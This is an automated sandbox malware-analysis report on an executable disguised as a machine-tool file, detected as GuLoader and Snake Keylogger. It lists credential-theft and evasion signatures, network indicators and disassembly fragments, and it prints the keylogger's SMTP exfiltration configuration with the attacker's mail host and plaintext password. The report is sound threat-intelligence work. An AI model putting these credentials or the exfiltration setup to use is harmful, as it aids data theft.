Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Overview

General Information

Sample name:SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Analysis ID:1527845
MD5:e7ebd3de4bcba42feee0d2bd98521920
SHA1:71608b8fd542467e554766de37cdc8244c84286f
SHA256:383d758b111ebf7255078b12d04f9f0e39ea4f85733563344754cbaad4bf0581
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T10:56:16.470754+020028033053Unknown Traffic192.168.11.2049712172.67.177.134443TCP
            2024-10-07T10:56:17.118729+020028033053Unknown Traffic192.168.11.2049713172.67.177.134443TCP
            2024-10-07T10:56:17.760474+020028033053Unknown Traffic192.168.11.2049714172.67.177.134443TCP
            2024-10-07T10:56:18.404606+020028033053Unknown Traffic192.168.11.2049715172.67.177.134443TCP
            2024-10-07T10:56:19.047470+020028033053Unknown Traffic192.168.11.2049716172.67.177.134443TCP
            2024-10-07T10:56:19.699159+020028033053Unknown Traffic192.168.11.2049717172.67.177.134443TCP
            2024-10-07T10:56:20.346164+020028033053Unknown Traffic192.168.11.2049718172.67.177.134443TCP
            2024-10-07T10:56:20.989727+020028033053Unknown Traffic192.168.11.2049719172.67.177.134443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T10:56:14.425508+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:16.081455+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:16.721927+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:17.378031+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:18.018459+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:18.658962+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:19.315074+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:19.955526+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            2024-10-07T10:56:20.596114+020028032742Potentially Bad Traffic192.168.11.2049710132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T10:56:09.869120+020028032702Potentially Bad Traffic192.168.11.2049708142.250.80.46443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeReversingLabs: Detection: 55%

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DC9A8 CryptUnprotectData,11_2_385DC9A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DD078 CryptUnprotectData,11_2_385DD078
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00406001 FindFirstFileA,FindClose,11_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00402688 FindFirstFileA,11_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_0040559F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_0011F048
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_0011F67B
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_0011F85B
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D021Dh11_2_385D0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D0BA7h11_2_385D0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D2870h11_2_385D2458
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D2131h11_2_385D1E80
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385DFAB7h11_2_385DF810
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385DF65Fh11_2_385DF3B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D2870h11_2_385D2448
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then mov esp, ebp11_2_385DECC8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385DF207h11_2_385DEF60
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385D2870h11_2_385D279E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EABB7h11_2_385EA8E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EA5CBh11_2_385EA290
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E8E49h11_2_385E8BA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E29FFh11_2_385E2758
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385ECC1Eh11_2_385EC950
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E1CF7h11_2_385E1A50
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E89EFh11_2_385E8748
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E0FEFh11_2_385E0D48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E02E7h11_2_385E0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E7CE7h11_2_385E7A40
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EEC0Eh11_2_385EE940
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E5E1Fh11_2_385E5B78
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385ED53Eh11_2_385ED270
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E5117h11_2_385E4E70
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E440Fh11_2_385E4168
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E3707h11_2_385E3460
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EF52Eh11_2_385EF260
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E4CBFh11_2_385E4A18
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E3FB7h11_2_385E3D10
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EB9DEh11_2_385EB710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E32AFh11_2_385E3008
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385ED9CEh11_2_385ED700
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E25A7h11_2_385E2300
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E6FDFh11_2_385E6D38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EA0DFh11_2_385E9E38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E93D7h11_2_385E9130
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EC2FEh11_2_385EC030
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EE2EEh11_2_385EE020
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E59C7h11_2_385E5720
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EF09Eh11_2_385EEDD0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E556Fh11_2_385E52C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EC78Eh11_2_385EC4C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E4867h11_2_385E45C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E189Fh11_2_385E15F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E0B97h11_2_385E08F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E8597h11_2_385E82F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EB0BEh11_2_385EADF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EF9BEh11_2_385EF6F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E788Fh11_2_385E75E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385ED0AEh11_2_385ECDE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E9C87h11_2_385E99E0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E073Fh11_2_385E0498
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E813Fh11_2_385E7E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E7437h11_2_385E7190
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EDE5Eh11_2_385EDB90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E982Fh11_2_385E9588
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EB54Eh11_2_385EB280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E3B5Fh11_2_385E38B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E2E57h11_2_385E2BB0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EE77Eh11_2_385EE4B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E214Fh11_2_385E1EA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385E1447h11_2_385E11A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 385EBE6Eh11_2_385EBBA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C864E0h11_2_38C861E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8DC68h11_2_38C8D970
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C83996h11_2_38C836C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8EAC0h11_2_38C8E7C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8BFB8h11_2_38C8BCC0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8A7D0h11_2_38C8A4D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8079Eh11_2_38C804D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C87CC8h11_2_38C879D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C842B6h11_2_38C83FE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8FDE0h11_2_38C8FAE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8D2D8h11_2_38C8CFE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C822C6h11_2_38C81FF8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8BAF0h11_2_38C8B7F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C810BEh11_2_38C80DF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C88FE8h11_2_38C88CF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C82756h11_2_38C82488
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8C480h11_2_38C8C188
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8154Eh11_2_38C81280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C89978h11_2_38C89680
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C85066h11_2_38C84D98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C88190h11_2_38C87E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8EF88h11_2_38C8EC90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C83076h11_2_38C82DA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8D7A0h11_2_38C8D4A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8AC98h11_2_38C8A9A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C85986h11_2_38C856B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C894B0h11_2_38C891B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C869A8h11_2_38C866B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C85EB7h11_2_38C85B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C89E40h11_2_38C89B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8030Eh11_2_38C80040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C87338h11_2_38C87040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C83E26h11_2_38C83B58
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8F450h11_2_38C8F158
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8C948h11_2_38C8C650
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C81E36h11_2_38C81B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8B160h11_2_38C8AE68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C80C2Eh11_2_38C80960
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C88658h11_2_38C88360
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C84747h11_2_38C84478
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C86E70h11_2_38C86B78
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C84BD6h11_2_38C84908
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C87800h11_2_38C87508
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8E5F8h11_2_38C8E300
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C82BE6h11_2_38C82918
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8CE10h11_2_38C8CB18
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C819B7h11_2_38C81710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8A308h11_2_38C8A010
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C854F6h11_2_38C85228
